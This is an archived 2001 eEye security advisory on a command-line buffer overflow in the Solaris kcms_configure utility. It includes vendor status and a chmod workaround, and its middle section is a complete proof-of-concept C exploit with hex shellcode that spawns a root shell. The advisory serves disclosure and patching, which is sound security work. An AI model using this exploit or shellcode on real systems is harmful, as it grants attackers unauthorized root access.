OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: eEye Digital Security (eeyeEEYE.COM)
Date: Mon Apr 09 2001 - 19:25:10 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Solaris kcms_configure vulnerability

    Discovered and exploited by:
    Riley Hassell rileyeeye.com

    Release Date:
    April 9, 2001

    Systems Affected:
    Solaris 7/8 (x86 and sparc)
    Versions prior are also most likely affected

    Description:
    It was another long day at eEye where the beer was once again cold but eEye
    Wudan member Riley decided it was time to do some Solaris spring cleaning.
    This is the first of several advisories to be released on various Solaris
    bugs that were laying around needing to be cleaned out.

    We have discovered a buffer overflow in the kcms_configure utility provided
    with Solaris 7. The problem exists in the parsing of command line options.
    By exploiting this vulnerability an attacker can achieve local root
    privileges. The Kodak Color Management System (KCMS) packages have contained
    many vulnerabilities in the past, we recommend disabling them if you are not
    currently using them.

    Proof of Concept:

    /*
     Command line argument overflow
     /usr/openwin/bin/kcms_configure

     Proof of Concept Exploitation
     Riley Hassell
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFLEN 1100

    /* seteuid/exec shellcode */
    char shell[] =
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
    "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
    "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
    "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
    "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
    "\x03\x9a\x04\x04\x04\x04\x07\x04";

    char buf[BUFLEN];
    unsigned long int nop, esp;
    long int offset = 0;

    unsigned long int get_esp() { __asm__("movl %esp,%eax");}

    int main (int argc, char *argv[])
    {
            int i;
            if (argc > 1)
              offset = strtol(argv[1], NULL, 0);
            else
                 offset = -300;
                nop = 600;
            esp = get_esp();
            memset(buf, 0x90, BUFLEN);
            memcpy(buf+600, shell, strlen(shell));
            for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
            *((int *) &buf[i]) = esp+offset;
             buf[BUFLEN-1] = '\0';
            execl("/usr/openwin/bin/kcms_configure", "eEye",
    "-o","-S","X",buf,NULL);
            return;
    }

    Vendor Status:
    Sun Microsystems has been contacted. They are currently working on patches
    for this and other related vulnerabilities eEye has discovered. We would
    like to thank them for working with us on creating a patch for this
    vulnerability.

    Workaround:
    chmod –s /usr/openwin/bin/kcms_configure
    This will remove the setuid bit from kcms_configure, therefore if someone
    does exploit this vulnerability, they won’t gain higher privileges.

    Greetings:
    ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
    but not least… all the kick ass people at Speakeasy.net.

    Copyright (c) 1998-2001 eEye Digital Security
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alerteEye.com for
    permission.

    Disclaimer
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    infoeEye.com